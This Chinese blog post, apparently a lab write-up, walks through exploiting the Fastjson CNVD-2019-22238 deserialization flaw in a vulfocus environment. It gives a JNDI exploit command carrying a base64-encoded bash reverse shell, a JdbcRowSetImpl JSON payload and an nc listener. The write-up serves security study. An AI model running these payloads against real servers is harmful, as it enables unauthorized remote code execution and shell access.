漏洞环境:vulfocus Fastjson-CNVD_2019_22238
影响版本:fastjson <1.2.48
拿到一个网站,先进行抓包测试,渗透千万不要在网页上做!
向这个地址POST一个JSON对象,就可以更新服务端信息,我这里用用单括号报错判断是否存在漏洞 500错误(已知这里存在该漏洞可以省去单括号判断)
这里的命令是下面这个,注意把IP换成自己的,bash命令里面的IP也换成自己的,可以用我第一个文章的工具一键转码
JNDIExploit自行在GitHub上面下载,一大堆
java8 -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A 攻击IP -C "bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzAuMC4wLjAvMTIzNCAwPiYx}|{base64,-d}|{bash,-i}"
使用payload尝试(这里注意的是fastjson每个版本的payload都不一样,如果自己的版本和我不一样,请自行在GitHub上面下载其他版本的payload)
{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit", "autoCommit":true}}
弹shell的那台机器记得监听端口
nc -lvvp 端口
发送请求!
成功反弹shell到攻击机上,找到了flag!
这里补充一个知识点,如果你在服务器搭建的靶场,注意用有公网IP的vps接shell,你的windows主机接不到哦!
原文始发于微信公众号(SUMMER渗透学习):Fastjson-CNVD_2019_22238漏洞利用
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论